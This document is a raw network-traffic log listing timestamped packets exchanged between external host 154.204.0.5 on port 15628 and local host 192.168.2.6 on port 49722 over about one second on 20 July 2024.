Jul 20, 2024 16:31:49.068276882 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:49.068350077 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:49.075150967 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:49.075225115 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:49.081229925 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:49.081302881 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:49.086536884 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:49.086662054 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:49.093924046 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:49.094120026 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:49.099540949 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:49.099625111 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:49.105418921 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:49.105542898 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:49.110450983 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:49.110724926 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:49.115828037 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:49.116013050 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:49.121000051 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:49.121110916 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:49.126785040 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:49.126905918 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:49.150767088 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:49.150913000 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:49.156384945 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:49.156696081 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:49.161761045 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:49.161943913 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:49.167082071 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:49.167272091 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:49.172355890 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:49.177596092 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:49.182571888 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:49.182750940 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:49.188663006 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:49.188909054 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:49.194334030 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:49.194428921 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:49.200510979 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:49.200622082 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:49.205883980 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:49.206015110 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:49.212121010 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:49.212304115 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:49.217920065 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:49.218031883 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:49.223206997 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:49.223332882 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:49.228374004 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:49.228494883 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:49.233843088 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:49.234024048 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:49.239168882 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:49.239303112 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:49.244520903 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:49.244728088 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:49.249789000 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:49.249965906 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:49.256130934 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:49.256405115 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:49.262378931 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:49.262509108 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:49.268208027 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:49.273665905 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:49.286007881 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:49.286236048 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:49.293750048 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:49.293972015 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:49.300412893 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:49.300636053 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:49.306597948 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:49.306735039 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:49.315608978 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:49.315726995 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:49.320661068 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:49.320816040 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:49.326204062 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:49.326374054 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:49.331204891 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:49.331346035 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:49.338392019 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:49.338649988 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:49.344178915 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:49.344332933 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:49.359319925 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:49.359528065 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:49.365134954 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:49.369714975 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:49.374841928 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:49.375037909 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:49.380208015 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:49.384602070 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:49.391393900 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:49.391590118 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:49.412178993 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:49.412403107 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:49.417635918 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:49.417830944 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:49.422792912 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:49.422945976 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:49.428252935 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:49.428442001 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:49.433471918 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:49.433615923 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:49.438575983 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:49.438720942 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:49.443622112 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:49.447735071 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:49.452924013 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:49.453161001 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:49.458070040 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:49.458282948 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:49.463763952 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:49.463960886 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:49.468859911 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:49.468997955 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:49.473932028 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:49.474070072 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:49.479691029 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:49.479863882 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:49.486629963 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:49.486828089 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:49.492512941 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:49.497560024 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:49.516206026 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:49.516274929 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:49.521930933 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:49.521992922 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:49.530525923 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:49.530646086 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:49.537035942 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:49.537095070 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:49.542114973 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:49.542176962 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:49.548129082 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:49.548182964 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:49.553168058 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:49.553225040 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:49.558263063 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:49.558321953 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:49.563679934 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:49.563743114 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:49.569128990 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:49.569185972 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:49.574270964 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:49.574330091 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:49.581862926 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:49.581922054 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:49.587039948 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:49.587147951 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:49.592046976 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:49.592103958 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:49.597349882 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:49.597409010 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:49.603229046 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:49.603279114 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:49.608882904 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:49.608937025 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:49.613949060 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:49.614005089 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:49.618999004 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:49.619071007 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:49.624042988 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:49.624097109 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:49.629004002 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:49.629060984 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:49.634115934 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:49.634166956 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:49.639580965 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:49.639635086 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:49.644536972 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:49.644597054 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:49.649482965 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:49.649542093 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:49.654448032 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:49.654499054 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:49.659351110 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:49.659400940 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:49.664295912 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:49.664340019 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:49.669209003 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:49.669264078 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:49.674226999 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:49.674288034 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:49.679199934 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:49.679248095 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:49.684130907 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:49.684182882 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:49.689392090 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:49.689460993 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:49.695455074 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:49.695509911 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:49.701107025 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:49.701178074 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:49.706444979 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:49.706500053 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:49.711841106 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:49.711900949 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:49.717447996 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:49.717505932 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:49.724775076 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:49.724833012 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:49.731686115 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:49.731743097 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:49.736722946 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:49.736778975 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:49.741751909 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:49.741803885 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:49.750729084 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:49.750780106 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:49.757057905 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:49.757110119 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:49.762048960 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:49.788436890 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:49.793766022 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:49.798504114 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:49.805829048 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:49.805898905 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:49.811045885 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:49.811104059 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:49.817579031 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:49.817648888 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:49.837064028 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:49.837131023 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:49.842241049 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:49.842304945 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:49.853030920 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:49.853085041 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:49.858334064 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:49.858403921 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:49.863651037 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:49.863718033 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:49.869060993 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:49.869136095 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:49.874480009 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:49.874552011 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:49.881428957 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:49.881488085 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:49.892015934 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:49.892081976 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:49.904108047 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:49.904186964 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:49.912316084 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:49.912381887 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:49.920902014 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:49.920958042 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:49.926510096 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:49.926572084 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:49.932143927 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:49.932204008 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:49.937191963 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:49.937248945 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:49.942188978 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:49.942241907 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:49.947487116 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:49.947546959 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:49.952574015 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:49.952632904 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:49.957669020 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:49.957727909 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:49.964991093 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:49.965053082 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:49.971899033 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:49.971952915 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:49.977391958 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:49.977444887 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:49.983541965 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:49.983604908 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:49.989131927 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:49.989193916 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:49.994995117 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:49.995057106 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:49.999962091 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:50.000027895 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:50.005465984 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:50.005525112 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:50.011945009 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:50.012010098 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:50.020595074 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:50.020659924 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:50.038017988 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:50.038089037 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:50.057461977 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:50.057531118 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:50.078502893 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:50.078587055 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:50.086945057 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:50.087016106 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:50.097831964 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:50.097891092 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:50.105762959 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:50.105839968 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:50.112241030 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:50.112312078 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:50.117810965 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:50.117872953 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:50.128931999 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:50.129000902 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:50.142456055 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:50.142540932 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:50.147499084 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:50.147561073 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:50.152529001 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:50.152589083 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:50.166703939 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:50.166784048 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:50.172194958 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:50.172252893 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:50.178288937 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:50.178343058 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:50.185480118 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:50.185542107 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:50.193851948 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:50.193922997 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:50.202516079 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:50.202580929 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:50.210302114 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:50.210366011 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:50.215437889 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:50.215503931 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:50.220551968 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:50.220666885 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:50.226018906 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:50.226078987 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:50.231107950 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:50.231164932 CEST	49722	15628	192.168.2.6	154.204.0.5
